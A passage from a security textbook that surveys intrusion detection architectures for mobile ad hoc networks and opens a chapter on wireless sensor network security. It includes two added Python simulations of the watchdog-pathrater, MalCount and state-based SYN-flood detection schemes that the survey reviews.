This approach is relatively naïve. First, the authors assume SNMP is secure in an ad hoc environment. In a network where routing is insecure, SNMP is not as secure as in a conventional network. Second, as mentioned in the earlier section, knowledge sharing is highly insecure in an ad hoc network. This leads to the insecurity of the LIDS system itself. Compromised nodes can announce misleading intrusion detection information, which will eventually corrupt the information base of the entire network. Finally, in a network with transient associations, the feasibility of mobile agents is questionable.

Stationary Secure Database IDS

Andrew (2001) proposes an IDS architecture which consists of a stationary secure database (SSD). Nodes post new information and decisions into this database. The architecture is simple, as shown in Figure 4. Only detection processing is done on the host, and the information is stored in a secure stationary centralized point.

The other components of the IDS are typical, namely, the misbehavior detection module (MDM), anomaly detection module (ADM), and communication port. These components form the mobile agent. A local intrusion database is also used to store node-specific attack patterns and various temporary information. The mobile agents will publish a newly found attack pattern to the SSD only after a certain level of confidence is reached. The communication port is used to communicate with the other nodes' host-based intrusion detection systems.

Figure 4. Secure stationary database architecture

Apparently, it can be seen that the stationary secure database (SSD) conflicts with the ad hoc characteristic of the absence of a centralized authority. Even if a node is voted as the centralized node using trust mechanisms, there is no surety that the node will behave benignly. Furthermore, a malicious node can corrupt the SSD by sending incorrect intrusion detection information. The SSD creates a hot spot, which is a single point of failure. Additionally, the SSD assumes cryptographic mechanisms on the communication between the IDS and the SSD. This violates the fundamental principle of IDS, which assumes "no existence of cryptographic mechanisms."

Modular Intrusion Detection Architecture

Kachirski and Guha (2002) propose an IDS where the intrusion-detection system is modularized into various submodules, as shown in Figure 5. The submodules are network monitoring, host monitoring, decision making, and response (action) modules. The modules are implemented in a mobile agent framework. Network monitoring is packet monitoring over the network. Host monitoring is monitoring of user behavior. A host-based monitor module exists in every node; however, a network-based monitor exists only in a selected few. Decision making and response modules exist in every node.

Figure 5. Modularized IDS architecture

The entire ad hoc network is segregated into clusters. Each cluster has a cluster-head, which runs the network-based monitoring. Therefore, packet-level monitoring is done by the cluster-head. Individual nodes use the packet-level audits from the cluster-head to improve the performance of the host-based intrusion detection system.

The strength of this IDS architecture is the augmentation of network-based IDS with host-based IDS. The combination of these mechanisms has proved very efficient in conventional IDS. Furthermore, the authors have eliminated the single point of failure by distributing the cluster-heads. This also distributes the management load between the cluster-heads of the network. Also, the host-level basis of decision making on an intrusion makes this approach robust against attacks on the IDS itself.

However, the architecture's trust in the cluster-head is its weak point. Malicious behavior of a cluster-head will lead to the compromise of all nodes under its control. In addition, similar to the other two mobile agent-based IDS, this architecture assumes secure routing, which may not be true.

Distributed IDS

Distributed IDS differs significantly from mobile agent-based IDS. Zhang, Lee, and Huang (2003) in their pioneering work propose a distributed IDS. The IDS architecture, as shown in Figure 6, consists of local and cooperative intrusion detection engines. These detection engines are interfaced with their respective response modules.

A local intrusion detection system is a typical host-based IDS. The cooperative intrusion detection engine is used to decide globally about a particular behavior pattern. The collection of all cooperative detection engines on all nodes forms a global intrusion detection engine. Semantically, cooperative detection is analogous to network-based intrusion detection. However, the global decision on behavior patterns will not dominate the local decision. Nonetheless, the global decision will aid the local response. A few incorrect decisions about a behavioral pattern will not affect the global decision, as a greater number of correct decisions will invalidate the incorrect decisions.

The local detection engine functions autonomously, independent of other nodes' detection engines. The cooperative engine will not aid the local detection engine in identifying a malicious behavior pattern. This prevents propagation of malicious or
wrong detection to other nodes. However, the local response to an attack is aided by the cooperative detection engine. Furthermore, a global response is deduced by collecting information from the various local intrusion detection engines of all nodes in the network. Eventually, this global response will be used for the response action for that particular behavior pattern.

Figure 6. Distributed IDS architecture

Although global decision sharing is more secure than behavior-pattern sharing, the authors did not discuss how local intrusion detection relies on the global responses. Routing insecurity provides an attacker the ability to create nonexistent nodes. Therefore, the attacker can emulate malicious behavior for these nonexistent nodes. Thus, the real majority of benign nodes will not help to guarantee the security of the distributed IDS.

Methodologies

TIARA

Techniques for intrusion-resistant ad hoc routing algorithms (TIARA) is essentially an intrusion prevention model (Ramanujan, Ahamad, Bonney, Hagelstrom, & Thurber, 2000). TIARA is a conglomeration of innovative techniques which provides:

• Light-weight firewalls
• Traffic policing
• Intrusion tolerant routing
• Intrusion detection
• Flow monitoring
• Reconfiguration mechanisms
• Multipath routing
• Source initiated route switching

It aims to minimize the damage incurred on the ad hoc network by destructive attacks such as DoS, distributed denial of service (DDoS), and so forth. Routing and data traffic are protected by TIARA. TIARA is a distributed framework and a highly efficient cross-layer intrusion prevention and detection mechanism. Exploring each of these techniques is beyond the scope of this chapter. Mishra has briefly discussed these techniques in his survey of ad hoc IDS.

However, it should be noted that intrusion detection is one module in the collection of techniques. The operational efficiency of the intrusion detection is unknown. Furthermore, tolerance to attacks is not the fundamental goal of an intrusion detection system. Unless the attackers are eliminated from the network or the attack is identified and segregated from benign traffic, the network is always under threat. Persistent attacks have a high probability of success. Therefore, immediate response to attack
is critical. TIARA has no response system for intrusions.

Threshold-Based Detection

A simplistic approach to ad hoc IDS is threshold-based detection. Bhargava and Agrawal (2001) propose an ad hoc IDS which prevents internal attacks (attacks within the network). Internal attacks are exhibited by nodes belonging to the network which behave maliciously, either by themselves or when compromised. Each node maintains a local variable called “MalCount” for every other node, which is increased for a particular node if its behavior is suspicious. Thus the MalCount array in a node tracks the level or state of suspicion that the host node has regarding the other nodes. Each node shares its local state of suspicion with respect to a particular node with other nodes in the network using a special packet, REMAL. When a node receives REMAL, it increases its local MalCount for the particular node under suspicion.

The authors overlooked many aspects of ad hoc security. First, malicious knowledge sharing using REMAL will have a cumulative malign effect on the network. Second, the security of the REMAL packet is unknown. Eventually, the entire network can be under threat by trusting unreliable REMAL packets. The crucial aspect of the security of the IDS is not considered in this methodology. Furthermore, routing security is not addressed.

Another interesting approach called watchdog-pathrater, which also uses a threshold, is proposed by Sergio, Giuli, Kevin, and Mary (2000). Watchdog-pathrater, as the name implies, has a monitor and an evaluator. Unlike Bhargava and Agrawal’s (2001) approach, watchdog-pathrater functions independently and does not share information with other nodes. When a packet is forwarded to a neighbor node, the forwarding node listens and monitors how the node behaves upon receiving the packet. A benign node will forward faithfully, which is overheard by the monitor. However, when the node does not forward the packet, the pathrater increases the failure rate for the path. The monitor does not distinguish between maliciousness and node faultiness. Upon the failure rate reaching the threshold, the node is discarded from any path. This method is analogous to fault-tolerance in typical routing algorithms. This method effectively detects and responds to malicious packet dropping attacks (sinks). However, it fails to address attacks such as route invasion, route disruption, and so forth.

State-Based Anomaly Detection

One of the interesting approaches in conventional IDS models is state-based intrusion detection. Michael and Ghosh (2000) incorporate a state-based model in ad hoc intrusion detection. They propose two anomaly detection methodologies, which use finite-state machines (FSM). FSM have proved successful in conventional IDS because of their adaptability and dynamic learning capability for new attacks.

The anomaly detection methods proposed by Michael and Ghosh (2000) use protocol states. In the first method, the sequence and frequency of protocol states are monitored. Intrusion is affirmed when a particular sequence deviates significantly from normal behavior patterns or the frequency of states exceeds a threshold. To increase robustness, their second approach uses probabilistic state-based intrusion detection. Each occurrence of a suspicious protocol state increases the probability of the behavior being malicious.

These two approaches are well suited for transport and application layer protocols, which have many protocol states, and the protocol states are predictable. For example, attacks such as a TCP SYN flood can be detected using this approach. However, this is not true in the case of routing protocols. State sequence or frequency of states does not distinguish a malicious behavior from a benign one. Traditionally, FSM were used to extract semantics from user behavior through application-layer protocols. In the case of ad hoc routing protocols, semantics is not represented by protocol states, but by factors such as current topology, mobility, connectivity, and so forth.
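The two threshold-based schemes described above, as an added illustration (not code from the cited papers): a watchdog that counts forwards handed to each neighbor and how many were overheard being re-transmitted, a pathrater that drops any path containing a node whose failure rate exceeds the threshold, and a MalCount array that is raised both by local suspicion and by unauthenticated REMAL reports. The trace, thresholds and node names are constructed for the example.

```python
"""Watchdog-pathrater and MalCount/REMAL, as summarised in the text.
Added example; thresholds and the forwarding trace are assumed values."""
from collections import defaultdict
from dataclasses import dataclass, field

FAILURE_THRESHOLD = 0.5   # assumed: failure rate above which a node is excluded
MIN_OBSERVATIONS = 5      # assumed: do not judge a node on fewer events


@dataclass
class Watchdog:
    """Monitor: per neighbor, packets handed over and packets overheard
    being forwarded onward."""
    handed: dict = field(default_factory=lambda: defaultdict(int))
    overheard: dict = field(default_factory=lambda: defaultdict(int))

    def observe(self, neighbor: str, forwarded: bool) -> None:
        self.handed[neighbor] += 1
        if forwarded:
            self.overheard[neighbor] += 1

    def failure_rate(self, neighbor: str) -> float:
        n = self.handed[neighbor]
        return 0.0 if n == 0 else 1.0 - self.overheard[neighbor] / n

    def suspects(self) -> set:
        """Neighbors over the threshold after enough observations. As the text
        notes, a faulty node and a malicious node are indistinguishable here."""
        return {
            nb for nb in self.handed
            if self.handed[nb] >= MIN_OBSERVATIONS
            and self.failure_rate(nb) > FAILURE_THRESHOLD
        }


def rate_paths(paths: list, suspects: set) -> list:
    """Pathrater: discard every path that contains a suspect node."""
    return [p for p in paths if not set(p) & suspects]


@dataclass
class MalCountNode:
    """Node keeping a MalCount entry per peer (Bhargava & Agrawal, 2001)."""
    name: str
    malcount: dict = field(default_factory=lambda: defaultdict(int))

    def local_suspicion(self, peer: str) -> None:
        self.malcount[peer] += 1

    def remal(self, peer: str) -> tuple:
        """The REMAL report this node broadcasts about `peer`. The text notes
        the packet is unauthenticated; receive_remal therefore trusts any
        sender, which is exactly the weakness the text criticises."""
        return ("REMAL", self.name, peer)

    def receive_remal(self, packet: tuple) -> None:
        kind, _sender, peer = packet
        if kind == "REMAL" and peer != self.name:
            self.malcount[peer] += 1


# Constructed trace seen by node A: (neighbor handed the packet, overheard?)
TRACE = [
    ("B", True), ("B", True), ("B", True), ("B", False), ("B", True),
    ("C", False), ("C", False), ("C", True), ("C", False), ("C", False),
    ("D", True), ("D", True),
]
PATHS = [["A", "B", "E"], ["A", "C", "E"], ["A", "D", "C", "E"]]


def run_watchdog(trace=TRACE, paths=PATHS) -> tuple:
    """Returns (suspect nodes, paths that remain usable)."""
    wd = Watchdog()
    for neighbor, forwarded in trace:
        wd.observe(neighbor, forwarded)
    suspects = wd.suspects()
    return suspects, rate_paths(paths, suspects)


def run_remal() -> dict:
    """Node A suspects C and reports it twice; B's MalCount for C rises
    without any check on who sent the reports."""
    a, b = MalCountNode("A"), MalCountNode("B")
    a.local_suspicion("C")
    b.receive_remal(a.remal("C"))
    b.receive_remal(a.remal("C"))
    return dict(b.malcount)


if __name__ == "__main__":
    print(run_watchdog())   # ({'C'}, [['A', 'B', 'E']])
    print(run_remal())      # {'C': 2}
```

Node D drops nothing but has too few observations to be judged, so only C (4 of 5 forwards unheard) is excluded.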


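The two state-based methods summarised above, as an added example that is not the authors' code: a protocol FSM for the server side of a TCP connection, a frequency rule that alarms when one source accumulates too many half-open (SYN received, never acknowledged) connections, a sequence rule that alarms on a transition the FSM does not allow, and a probabilistic score per source that every suspicious state raises. The packet log and all thresholds are constructed values.

```python
"""State-based anomaly detection over protocol states (Michael & Ghosh, 2000,
as summarised in the text). Added example; log and thresholds are assumed."""
from collections import defaultdict

# Legal transitions of a simplified server-side TCP state machine.
FSM = {
    ("CLOSED", "SYN"): "SYN_RCVD",
    ("SYN_RCVD", "ACK"): "ESTABLISHED",
    ("ESTABLISHED", "FIN"): "CLOSE_WAIT",
    ("CLOSE_WAIT", "ACK"): "CLOSED",
    ("SYN_RCVD", "RST"): "CLOSED",
    ("ESTABLISHED", "RST"): "CLOSED",
}
HALF_OPEN_THRESHOLD = 3     # assumed: half-open connections allowed per source
PROB_THRESHOLD = 0.9        # assumed: score at which the probabilistic method alarms
SUSPICION_WEIGHT = 0.4      # assumed: evidence added by each suspicious state


class StateDetector:
    def __init__(self):
        self.state = defaultdict(lambda: "CLOSED")   # (src, sport) -> state
        self.half_open = defaultdict(int)             # src -> open SYN_RCVD count
        self.prob = defaultdict(float)                # src -> P(malicious)
        self.alarms = []

    def _raise_prob(self, src: str, reason: str) -> None:
        # Second method: combine evidence so the score approaches but never exceeds 1.
        self.prob[src] = 1 - (1 - self.prob[src]) * (1 - SUSPICION_WEIGHT)
        if self.prob[src] >= PROB_THRESHOLD:
            self.alarms.append(("probabilistic", src, reason))

    def feed(self, pkt: dict) -> None:
        key = (pkt["src"], pkt["sport"])
        cur = self.state[key]
        nxt = FSM.get((cur, pkt["flag"]))
        if nxt is None:
            # First method, sequence rule: transition not allowed by the FSM.
            self.alarms.append(("bad-transition", pkt["src"], f"{cur}+{pkt['flag']}"))
            self._raise_prob(pkt["src"], "illegal transition")
            return
        if nxt == "SYN_RCVD":
            self.half_open[pkt["src"]] += 1
            self._raise_prob(pkt["src"], "half-open")
            if self.half_open[pkt["src"]] > HALF_OPEN_THRESHOLD:
                # First method, frequency rule: too many connections in one state.
                self.alarms.append(("syn-flood", pkt["src"], self.half_open[pkt["src"]]))
        elif cur == "SYN_RCVD":
            self.half_open[pkt["src"]] -= 1   # handshake completed or reset
        self.state[key] = nxt


# Constructed log: one benign client, one source leaving many half-open
# connections, and one source sending an ACK for a connection that never existed.
PACKETS = [
    {"src": "10.0.0.5", "sport": 40001, "flag": "SYN"},
    {"src": "10.0.0.5", "sport": 40001, "flag": "ACK"},
    {"src": "10.0.0.9", "sport": 5001, "flag": "SYN"},
    {"src": "10.0.0.9", "sport": 5002, "flag": "SYN"},
    {"src": "10.0.0.9", "sport": 5003, "flag": "SYN"},
    {"src": "10.0.0.9", "sport": 5004, "flag": "SYN"},
    {"src": "10.0.0.9", "sport": 5005, "flag": "SYN"},
    {"src": "10.0.0.5", "sport": 40001, "flag": "FIN"},
    {"src": "10.0.0.5", "sport": 40001, "flag": "ACK"},
    {"src": "10.0.0.7", "sport": 6000, "flag": "ACK"},
]


def analyse(packets=PACKETS) -> dict:
    """Run the detector over a log and return alarms and per-source state."""
    det = StateDetector()
    for p in packets:
        det.feed(p)
    return {
        "alarms": det.alarms,
        "half_open": dict(det.half_open),
        "prob": {s: round(v, 3) for s, v in det.prob.items()},
    }


if __name__ == "__main__":
    for alarm in analyse()["alarms"]:
        print(alarm)
```

The benign client's half-open count returns to zero once its ACK arrives, so only the flooding source trips the frequency rule (at its fourth SYN) and the probabilistic rule (at its fifth).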

FUTURE TRENDS

Research in ad hoc network security is in its embryonic stages. Ad hoc network IDS is even more rudimentary, since the quest for an efficient intrusion prevention mechanism is not over yet (Hubaux, Buttyan, & Capkun, 2001). Intrusion prevention and detection mechanisms are mutually productive for ad hoc security. Clearly, a concrete and practical IDS model for ad hoc networks is yet to be evolved.

Historically, conventional IDS systems were subjected to intensive research and analysis before becoming practical. Analogous to conventional IDS, ad hoc intrusion detection needs more research. It is evident that consideration of ad hoc network characteristics plays a vital role in the outcome of the IDS model. In the literature, most of the research focus was on IDS architectures. However, IDS in ad hoc networks require innovative detection strategies to resolve the issues pertaining to IDS in ad hoc networks.

To summarize, we enumerate below the observations made from the study of ad hoc IDS models proposed in the literature.

First, routing security should be the crux of the IDS. Similar to conventional IDS, intensive statistical analysis and research is required on the feasibility of statistical and rule-based detection methodologies with respect to routing behavioral data. Routing control messages produce a new kind of audit trail. New features linked to the properties of routing control messages have to be derived. These derived parameters will aid in analyzing the feasibility of various detection methodologies.

Second, the absence of a centralized node necessitates innovative adaptation in the IDS. Adaptation is the process of learning new attacks and attack resolving techniques (responses), as well as changing statistical parameters with respect to the ad hoc network environment. Adaptation in a highly dynamic network is an interesting and new challenge. The efficiency of various computational intelligence methods, which are also used in conventional IDS, has to be analyzed. Learning new attacks through intelligence in the ad hoc IDS paradigm is an unexplored research domain.

Finally, the most significant ad hoc network characteristics which affect the IDS model are the three Ds: distributed, decentralized and dynamic nature. An IDS architecture which considers these three factors will essentially be efficient. However, the IDS architecture should also consider the limitations of detection methodologies.

CONCLUSION

The implementation of intrusion detection systems in ad hoc networks is hindered by the inherent characteristics of these networks. These characteristics were examined and their significance was observed. The differences between conventional and ad hoc intrusion detection systems are detailed. Requirements of an effective ad hoc IDS are studied. Various proposed IDS architectures and methodologies are explored and their strengths and weaknesses are discussed. The future of ad hoc IDS depends mostly on the statistical properties of ad hoc networks’ routing behaviors. Therefore, considerable research and development is required in this domain.

REFERENCES

Andrew, B., Smith. (2001, May). An examination of an intrusion detection architecture for wireless ad hoc networks. Paper presented at the 5th National Colloquium for Information System Security Education.

Athanasiades, N., Abler, R., Levine, J., Owen, H., & Riley, G. (2003). Intrusion detection testing and benchmarking methodologies. Paper presented at the First IEEE International Workshop on Information Assurance, IWIAS 2003.

Awerbuch, B., Curtmola, R., Holmer, D., Nita-Rotaru, C., & Rubens, H. (2004). Mitigating Byzantine attacks in ad hoc wireless networks. Johns Hopkins University, Department of Computer Science.

Awerbuch, B., Curtmola, R., Holmer, D., Rubens, H., & Nita-Rotaru, C. (2005). On the survivability of routing protocols in ad hoc wireless networks.



Paper presented at the Security and Privacy for Emerging Areas in Communications Networks, SecureComm 2005.

Balajinath, B., & Raghavan, S. V. (2001). Intrusion detection through learning behavior model. Computer Communications, 24(12), 1202-1212.

Bhargava, S., & Agrawal, D. P. (2001, Fall). Security enhancements in AODV protocol for wireless ad hoc networks. Paper presented at the IEEE 54th Vehicular Technology Conference, VTC 2001.

Brutch, P., & Ko, C. (2003). Challenges in intrusion detection for wireless ad-hoc networks. Paper presented at the Applications and the Internet Workshops, 2003.

Bykova, M., Ostermann, S., & Tjaden, B. (2001). Detecting network intrusions via a statistical analysis of network packet characteristics. In Proceedings of the 33rd Southeastern Symposium on System Theory, 2001.

Debar, H., Dacier, M., & Wespi, A. (1999). Towards a taxonomy of intrusion-detection systems. Computer Networks: The International Journal of Computer and Telecommunications Networking, 31(8), 805-822.

Duda, R. O., Hart, P. E., & Stork, D. G. (2000). Pattern classification (2nd ed.). Wiley Inter-Science Publication.

Hijazi, A., & Nasser, N. (2005). Using mobile agents for intrusion detection in wireless ad hoc networks. Paper presented at the Second IFIP International Conference on Wireless and Optical Communications Networks, WOCN 2005.

Hossain, M., Bridges, S. M., & Vaughn, R. B., Jr. (2003). Adaptive intrusion detection with data mining. Paper presented at the IEEE International Conference on Systems, Man and Cybernetics, 2003.

Huang, Y. A., & Lee, W. (2004). Attack analysis and detection for ad hoc routing protocols. Recent advances in intrusion detection, proceedings (Vol. 3224, pp. 125-145). Berlin: Springer-Verlag.

Hubaux, J.-P., Buttyan, L., & Capkun, S. (2001). The quest for security in mobile ad hoc networks. Paper presented at the 2nd ACM International Symposium on Mobile Ad Hoc Networking & Computing, Long Beach, CA.

Jacoby, G. A., Marchany, R., & Davis, N. J., IV. (2004). Battery-based intrusion detection: A first line of defense. Paper presented at the Information Assurance Workshop, 2004/Proceedings from the Fifth Annual IEEE SMC.

Kachirski, O., & Guha, R. (2002). Intrusion detection using mobile agents in wireless ad hoc networks. Paper presented at the IEEE Workshop on Knowledge Media Networking, 2002.

Kong, J., Hong, X., & Gerla, M. (2003). A new set of passive routing attacks in mobile ad hoc networks. Paper presented at the Military Communications Conference, MILCOM 2003. IEEE.

Lamport, L., Shostak, R., & Pease, M. (1982). The Byzantine generals problem. ACM Transactions on Programming Languages and Systems, 4(3), 382-401.

Little, M. (2005). TEALab: A testbed for ad hoc networking security research. Paper presented at the Military Communications Conference, MILCOM 2005. IEEE.

Michael, C. C., & Ghosh, A. (2000). Two state-based approaches to program-based anomaly detection. Paper presented at the 16th Annual Computer Security Applications Conference, ACSAC ’00.

Mishra, A., Nadkarni, K., & Patcha, A. (2004). Intrusion detection in wireless ad hoc networks. IEEE Wireless Communications, 11(1), 48-60.

Nadkarni, K., & Mishra, A. (2003). Intrusion detection in MANETS: The second wall of defense. Paper presented at the 29th Annual Conference of the IEEE Industrial Electronics Society, IECON 2003.

Papadimitratos, P., & Haas, Z. (2002, January 27-31). Secure routing for mobile ad hoc networks. Paper presented at the SCS Communication Networks



and Distributed Systems Modeling and Simulation Conference (CNDS 2002), San Antonio.

Patrick, A., Olivier, C., Jean-Marc, P., Bernard, J., Ludovic, M., & Ricardo, P. (2002). Security in ad hoc networks: A general intrusion detection architecture enhancing trust based approaches. Paper presented at the 1st International Workshop on Wireless Information Systems, Ciudad Real, Spain.

Pokrajac, D., & Lazarevic, A. (2004). Applications of unsupervised neural networks in data mining. Paper presented at the 7th Seminar on Neural Network Applications in Electrical Engineering, NEUREL 2004.

Ramanujan, R., Ahamad, A., Bonney, J., Hagelstrom, R., & Thurber, K. (2000). Techniques for intrusion-resistant ad hoc routing algorithms (TIARA).

Sergio, M., Giuli, T. J., Kevin, L., & Mary, B. (2000). Mitigating routing misbehavior in mobile ad hoc networks.

Shimomura, T., & Markoff, J. (1996). Take down: The pursuit and capture of Kevin Mitnick, America’s most notorious cyber-criminal; by the man who did it. London: Secker & Warburg.

Verwoerd, T., & Hunt, R. (2002). Intrusion detection techniques and approaches. Computer Communications, 25(15), 1356-1365.

Yang, S., & Baras, J. S. (2003). Modeling vulnerabilities of ad hoc routing protocols. Paper presented at the 1st ACM Workshop on Security of Ad Hoc and Sensor Networks, Fairfax, Virginia.

Zhang, Y., Huang, Y.-A., & Lee, W. (2005). An extensible environment for evaluating secure MANET. Paper presented at the First International Conference on Security and Privacy for Emerging Areas in Communications Networks, SecureComm 2005.

Zhang, Y. G., Lee, W. K., & Huang, Y. A. (2003). Intrusion detection techniques for mobile wireless networks. Wireless Networks, 9(5), 545-556.

KEY TERMS

Ad Hoc Networks: Ad hoc networks are loosely organized and configured networks. There are no centralized nodes, such as routers, gateways, and so forth. All network functions are done by every node, and thereby every node supports the network’s functioning.

Anomaly Detection: Anomaly detection is a type of intrusion detection in which the historical normal behavior of the network is used. Any deviation of a behavior from the normal will raise an alarm.

Audit Trails: Audit trails describe a network or node behavior. They contain values for a set of parameters, which are recorded at periodic intervals of time. The parameter set is called the feature set and usually differs between different network environments, protocols, and systems.

Intrusion/Attack: Intrusion is a behavior of an external or internal node(s) with malign intent, which aims to affect other benign nodes in the network.

Intrusion Detection: Intrusion detection is the process of identifying and distinguishing malicious behavior from the normal network traffic.

Misbehavior Detection: Misbehavior detection is a complement to anomaly detection. In this type of intrusion detection, known intrusion behavior patterns are used. Any resemblance of a behavior to these patterns will result in an alarm.

Mobile Agents: Mobile agents are specialized software which move between nodes to accomplish their assigned tasks, such as data collection and so forth.




Chapter XXXIV
Security in Wireless
Sensor Networks
Luis E. Palafox
CICESE Research Center, Mexico

J. Antonio Garcia-Macias
CICESE Research Center, Mexico

ABSTRACT

In this chapter we present the growing challenges related to security in wireless sensor networks. We show possible attack scenarios and demonstrate how easily several types of attacks can be perpetrated due to the extreme resource limitations that wireless sensor networks are subjected to. Nevertheless, we show that security is a feasible goal in this resource-limited environment; to prove that s… survey several proposed sensor network security protocols targeted to different layers in the protocol stack. The work surveyed in this chapter enables several protection mechanisms against well documented network attacks. Finally, we summarize the work that has been done in the area and present a series of ongoing challenges for future work.

INTRODUCTION

Recently, wireless sensor networks (WSN) have gained great popularity, mainly because they provide a low cost alternative for solving a great variety of real-world problems (Akyildiz, Su, & Sankarasubramaniam, 2003). Their low cost enables the deployment of large numbers of sensor nodes (in the order of thousands, and in the future perhaps millions), which most of the time operate in harsh environments. WSN present extreme resource limitations, mainly in available memory space and energy source. Both limitations represent great obstacles for the integration of traditional security techniques. The highly unreliable communication channels that are used in WSN and the fact that they operate unattended make the integration of security techniques even harder.

Wireless sensor networks today offer the processing capabilities of computers of a few decades ago, and the industry’s trend is to reduce the cost of wireless sensing nodes while maintaining the

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security in Wireless Sensor Networks

same processing power. Based on this idea, many researchers have started to face the challenge of maximizing processing capabilities and reducing energy consumption while protecting sensor networks from possible attacks.

BACKGROUND

WSN have many more limitations than other traditional computer networks. Due to these limitations, it is unfeasible to use the traditional security approaches in these resource-constrained networks. Thus, to develop efficient security techniques, it is imperative to consider the limitations involved.

Extremely Limited Resources

Every security mechanism requires a certain amount of resources for its implementation; these resources include data memory, program memory, and the energy source that powers the sensor node. However, these resources are very scarce in sensor nodes.

• Memory limitations. In order to implement an efficient security mechanism, the algorithm used for such implementation must have a small footprint.
• Energy limitations. When including security mechanisms, careful attention should be paid to energy-depleting factors including the energy consumed in computation of the security functions (i.e., encrypt, decrypt, data signatures, signature verification), the energy consumed by additional security related data transmissions or overhead (i.e., initialization vectors required for encrypt/decrypt), and the energy spent in storing the security related parameters (i.e., cryptographic keys).

Highly Unreliable Communication Medium

Unreliable communication is another threat to WSN. The security relies heavily on a defined protocol, which depends on communication.

• Unreliable transfers. The packets can be corrupted or even discarded due to errors in the communication channel or to congested nodes, which results in packet loss; as a consequence, application developers are forced to allocate extra resources for error handling. Most important is the fact that if a protocol does not have the appropriate mechanisms for error handling, packets including critical security information could be lost (e.g., a cryptographic key).
• Conflicts. Even if we had a reliable communication channel, the communication still could be unreliable due to the broadcast nature of sensor networks. If a collision occurs in the middle of a transfer, there would be conflicts and the transfer itself would fail. On a highly populated network this can be a big problem, as has already been pointed out (Akyildiz, Su, Sankarasubramaniam, & Cayirci, 2002).
• Latency. Multihop routing, network congestion, and in-network processing can introduce latency to the network, making synchronization between nodes difficult. Synchronization problems can be critical for network security mechanisms that rely on error reporting and cryptographic key distribution. Some real-time communications techniques could be used in WSN (Stankovic, Abdelzaher, Lu, Sha, & Hou, 2003).

Unattended Operation

On most wireless sensor network applications, nodes are left unattended for long time periods. The three main disadvantages of leaving the network unattended are:

• Exposure to physical attacks. The network can be deployed in an environment open to adversaries, in undesirable climatic conditions, and so forth. Thus, the probability of a node suffering a physical attack is much higher than for typical computers on traditional networks, which normally are placed in a secure location and only face attacks through the network.



• Remote management. Remote network management makes the detection of physical attacks or network maintenance problems practically impossible. The most extreme example is perhaps when a node is being used in a military battlefield reconnaissance application; in that case the node would no longer have physical contact with the user once deployed.
• No central point of administration. A sensor network must be distributed, with no central point of administration. However, if its design is not adequate, network organization would be hard, inefficient, and fragile.

Summarizing, the time the sensor network spends unattended is directly proportional to the probability of an adversary performing an attack on any of its nodes.

Security Requirements

Wireless sensor networks share many characteristics with traditional networks, including their security requirements; however, they also introduce several requirements that are exclusive to them.

Data Confidentiality

Data confidentiality is the biggest problem in network security. Every network with any security approach would probably address this issue before any other. In sensor networks, confidentiality relates to the following (Carman, Kruus, & Matt, 2000; Perrig, Szewczyk, Tygar, Wen, & Culler, 2002):

• A sensor node must not leak sensor readings to its neighbors; particularly in military applications, where the data stored in a node can be highly confidential.
• In many applications, the nodes need to communicate highly confidential data (i.e., key distribution); thus, it is very important to build a secure communication channel in WSN.
• The nodes’ public information, such as their identity and their public keys, can be encrypted to a certain extent to protect against traffic analysis attacks.

The traditional approach for keeping confidential information secret is to encrypt it using a secret key that only the destination node knows, thus resulting in confidentiality.

Data Integrity

With the implementation of confidentiality an adversary may be unable to steal any data from the sensor network. However, this does not imply that the data are secure. The adversary could still be able to modify the data to the degree of affecting the overall operation of the network. For instance, a malicious user may add or remove certain fragments of a packet. Then, this packet could be sent to its original destination. Data loss or corruption can occur even without the presence of a malicious user, due to harsh environmental conditions. Thus, data integrity helps to assure that the received data have not been modified in transit.

Data Freshness

Even though data confidentiality and integrity have been achieved, we must assure that each message is fresh. Data freshness suggests that the data are recent, and assures that no old message has been resent. This requirement is especially important when shared key strategies are being used. Typically, shared keys need to be renewed over time. However, it takes time to propagate the new keys through the entire network. Under this scheme, it would be easy for an adversary to perpetrate a packet replay attack. Furthermore, it would be easy to corrupt the operation of the network if the nodes are not well informed of the time at which the key will change. To solve this problem, a time dependent counter may be added to the packet for assuring data freshness.

Authentication

Besides modifying packets, an adversary can also potentially alter the flow of the packets through



the addition of fake packets to the network. Consequently, the adversary can make a receiving node believe that the data come from an authentic source. Additionally, authentication is needed for several administrative tasks (i.e., dynamic network reprogramming, controlling node duty cycle). Thus, we can determine that message authentication is important for many sensor network applications.

Availability

Adjusting current traditional encryption algorithms to sensor networks implies an additional cost. Some approaches suggest modifying code to favor code reutilization as much as possible. Other approaches tend to use additional communication to achieve the same goal. Other more radical approaches impose restrictions on the data or propose less robust schemes (like centralized schemes) to simplify algorithms. But all of these approaches decrease the level of availability of the nodes and consequently the availability of the entire network, for the following reasons:

• The introduction of additional processing results in additional power consumption. If we exhaust the available energy of a node, its data would no longer be available.
• Introducing additional communication operations also consumes more energy. Furthermore, adding more communication considerably increases the probability of generating a collision.
• If we introduce a centralized scheme, it would have a single point of failure, which is a constant threat to the availability of the entire network.

The implementation of security mechanisms not only interferes with network operation, it also can considerably affect availability of the entire network.

Autoconfiguration

WSN are an extreme case of ad hoc networks, which require that each node be independent and flexible in configuring itself according to several situations. There is no fixed infrastructure to administer a sensor network. This also brings a great challenge for security in this type of network. For instance, the dynamic nature of the network suggests preinstalling a key shared between the base station and the rest of the nodes (Eschenauer & Gligor, 2002). Several schemes of random key distribution have been proposed in the context of symmetric encryption techniques (Chan, Perrig, & Song, 2003; Eschenauer & Gligor, 2002; Hwang & Kim, 2004; Liu, Li, & Ning, 2005). In the area of public key cryptography on wireless sensor networks, this same dynamicity requires efficient mechanisms for key distribution. WSN must autoconfigure for key management and for establishing trust relationships among nodes, in a similar way as they autoconfigure to perform multihop routing.

If a sensor network lacks autoconfiguration, the damage done by an adversary or even by the hostile environment could be fatal.

Security Attacks on Wireless Sensor Networks

The nature of WSN makes them vulnerable to several types of attacks. Such attacks can be perpetrated in a variety of ways; most notable are the denial of service attacks (DoS), but there are also traffic analysis attacks, eavesdropping, physical attacks, and others. DoS attacks in wireless sensor networks range from simple communication channel saturation techniques to more sophisticated ones designed to tamper with the message authentication code (MAC) layer protocol (Perrig, Stankovic, & Wagner, 2004).

Due to the great differences in available energy and computational power, protecting against a well designed denial-of-service attack is practically impossible. A more powerful node could easily block any other normal node and consequently prevent the sensor network from performing its function.

We can observe that attacks on sensor networks are not exclusively restricted to denial-of-service attacks; among these other types of attacks we can


include compromised nodes, attacks on routing protocols, and physical attacks.

Attack Scenario

